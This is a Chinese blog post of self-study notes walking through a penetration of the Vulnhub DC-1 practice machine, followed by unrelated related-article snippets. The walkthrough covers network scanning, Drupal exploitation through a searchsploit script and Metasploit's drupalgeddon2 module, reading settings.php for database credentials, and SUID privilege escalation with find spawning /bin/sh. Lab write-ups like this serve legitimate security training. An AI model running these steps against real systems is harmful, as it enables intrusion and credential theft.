DC-1 靶机-自学笔记整理

最新推荐文章于 2024-05-27 16:46:38 发布
最新推荐文章于 2024-05-27 16:46:38 发布
阅读量36 收藏
点赞数
分类专栏: 靶机 文章标签: 笔记 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SSDOK1O2/article/details/132212820
版权

信息收集

1.扫描同一局域网下ip,寻找目标靶机ip

//法一:
nmap -sS -T4 192.168.136.0/24


//法二:
masscan 192.168.136.0/24 -p1-1000   #俗称10秒快速扫描端口工具

 

2. 对目标靶机进行全面扫描  

nmap 加主机ip -A -p- oN zc.txt

没有发现有用信息

3.用dirb、gobuster工具对敏感目录进行扫描,同样发现并没有发现有用信息

4. 收集网站信息

利用火绒插件wappalyzer,查看站点信息,系统为cms框架就是drupal

 

漏洞查找与利用

知道cms,我们一般从cms出发找漏洞,百度一下drupal漏洞

发现果然存在框架漏洞:

查找漏洞

法一:

searchsploit drupal

 

 将34992.py漏洞下载到本地:

python2 34992.py

 创建管理员账户:

 返回登录测试:

法二:

用工具Metasploit(目前世界上领先的渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一),找一下漏洞,先打开工具使用msfconsole进行操作  

msfconsole

寻找系统漏洞:

使用漏洞:

use exploit/unix/webapp/drupal_drupalgeddon2

 接着看一下该漏洞模块参数:

 

注:

Current Setting是目前设置的内容

Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置

就上面来说RHOSTS需要set,但是没有内容

先登录shell(获得反弹),且获得交互 :

 

python -c "import pty;pty.spawn('/bin/bash')"

注意:

根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径挺复杂的 不过知道名字叫settings.php,我们可以用命令直接搜索并打开,

cat `find / -name settings.php`

 

 得到数据库账号密码,尝试登录数据库查找关键有用信息:

 

查看用户表:

 

 

 

 提权

1.通过提示,查找根目录下面的用户信息,查到flag4用户

 

2.使用用户flag4登录ssh

find / -perm -u=s -type f  ##查找根路径下具有suid权限的可执行文件
#suid 只对可执行文件生效  是指 任何用户执行该文件都是以目标文件所属者身份运行的

 

3.进行提权:

find /bin -exec "/bin/sh"

 

补充:

在选择相关命令进行提权时,以find为例(用得最多)

先ls查看当前目录文件利用具有suid权限的find搭配exec进行提权

知识点

 

 

along_sir
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-2靶机详解,2024年最新2024网络安全架构面试指南
2301_82101171的博客
04-13 258
接下来使用一个工具 WPScan,同样 kali 自带爆破结果,存在2个账户这里可以用dirb工具扫一下有哪些可以登录的页面使用账号 jerry 登录后可以发现 flag2说人话flag 提示,如果 wordpress 打不下来,就得换一个入口上面使用了 wpscan 进行了扫描和爆破,但是漏洞扫描没有任何结果,因为现在 wpscan 扫描漏洞需要 API Token 的支持,所以需要访问 https://wpvulndb.com/users/sign_up 注册一个账号,获得 API Token。
DC-2靶机详解,附小技巧
2401_83947398的博客
04-17 833
我看了一下,大部分需要认证,并且都是 XSS 之类的,靶机这环境根本没用,有一个 WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution 可以试一试,反正也有账号。根据信息,CVE 编号为 CVE-2019-8942、CVE-2019-8943,MSF 里正好有模块,不过其实是不好利用的,因为这个漏洞是通过文件上传造成的,而 jerry 和 tom 都无法上传,只有 admin 有权限修改上传点。查看 passwd 文件。
DC-5靶机,致网络安全开发者
2301_79058150的博客
04-03 797
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
DC-2靶机详解(1),网络安全基础入门教程
2301_82101171的博客
04-13 863
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Vulnhub-Empire靶机-详细打靶流程,通用流行框架大全
m0_60567796的博客
04-18 301
你好朋友,我很高兴你找到了我的秘密目录,我创建了这样的与你分享我的创建SSH私钥文件, 它隐藏在这里的某个地方,这样黑客就不会找到它,也不会用快速通道破解我的密码。看到模块中引用了,os模块,想到通过os.system(“/bin/bash”),新启一个shell,将os.system(“/bin/bash”)加入到webbrowser.py中。看到一个py文件,arsene用户可以在没有passwd的环境下,使用heist.py,就想到在py中新启动一个arsene,shell环境。
DC-2靶机详解(1),2024年最新网络安全面试刷题
2401_83947353的博客
04-17 957
wpscan --url http://dc-2/ --api-token 这边填你的APIToken。export PATH=$PATH:/bin:/usr/bin:这个命令将当前 $PATH。:set shell=/bin/sh:这个命令将 Vi 编辑器的 shell 设。这意味着系统将在 /bin 和 /usr/bin 目录中查找命令。的值与 /bin 和 /usr/bin 目录结合起来,并将结果重新分配给。会 在 $PATH 中列出的目录中查找这个命令的可执行文件。搜索可执行文件时要查找的目录。
vulvhub-----Hacker-KID靶机,2024年最新网络安全源码的Binder权限是如何控制
m0_60567908的博客
04-18 313
bashrc 文件是一个在 Bash shell 启动时自动执行的脚本文件。Bash 是 Linux 和其他 UNIX-like 系统中常用的 shell,而 .bashrc 文件通常位于用户的主目录下(例如,/home/username/ 或 ~),并且通常包含用户的个性化设置和别名等。.bashrc 文件中的命令会被自动执行。dig命令是一个灵活的DNS查询工具,用于从DNS域名服务器查询主机地址信息。,是一个注册页面,查看源码,发现是xml格式,猜测是XXE漏洞,抓包验证。
DC-2靶机详解,实战讲述Flutter跨平台框架应用
2401_84164576的博客
04-09 661
根据信息,CVE 编号为 CVE-2019-8942、CVE-2019-8943,MSF 里正好有模块,不过其实是不好利用的,因为这个漏洞是通过文件上传造成的,而 jerry 和 tom 都无法上传,只有 admin 有权限修改上传点。这个命令的目的是对指定的IP地址范围进行广泛的扫描,包括所有的端口,并尝试识别目标主机的操作系统和开放的服务版本。wpscan --url http://dc-2/ --api-token 这边填你的APIToken。枚举用户来收集关于该WordPress网站的用户信息。
DC-2靶机详解(2),网络安全开发工程师面试题目
2401_84164576的博客
04-09 875
环境仅供参考。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Git笔记
985小菜鸡
05-21 331
完成以上步骤后,您的本地项目应该已经成功上传到 GitHub 仓库中了。您可以在 GitHub 网站上查看并访问您的项目。,如果您使用的是其他分支,请将其替换为您的分支名称。这里假设您的本地分支是。
【加密与解密(第四版)】第四章笔记
m0_58213960的博客
05-21 716
x64系统通用寄存器的名称,第1个字母从“E”改为“R”(例如“RAX”),大小扩展到 64 位,数量增加了8个(R8~R15),扩充了8个128位XMM寄存器(在64位程序中,XMM寄存器经常被用来优化代码)。64位寄存器与x86下的32位寄存器兼容,例如RAX(64位)EAX(低32)、AX(低16位)、AL(低8位)和AH(8~15位)。x64新扩展的寄存器高低位访问,使用WORD、BYTE、DWORD后级,例如R8(64位)R8D(低32位)、R8W(低16位)和R8B(低8位)。
强化学习——学习笔记
最新发布
qq_52302919的博客
05-27 927
强化学习问题通常可以建模为一个马尔可夫决策过程,包括以下几个要素:1、状态集合 (State Set):S;2、动作集合 (Action Set):A;Ps′∣saPs′∣sa,描述在状态s下执行动作a后转移到状态s′s^′s′的概率;Rsas′Rsas′,描述在状态s 下执行动作a并转移到状态s′后获得的奖励。πa∣sπ (a∣s)πa∣s,描述智能体在状态s下选择动作a 的概率。
Vue学习笔记3——事件处理
qq_44778824的博客
05-22 393
尽管我们可以直接在方法内调用,但如果方法能更专注于数据逻辑而不用去处理DOM事件的细节会更好。)来监听DOM事件,并在事件触发时执行对应的JavaScript。// 读取data里面数据的方法:this.count。// 所有方法或者函数都放在这里,跟data同级。为解决这一问题,Vue 为。对象和通过事件传递数据。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值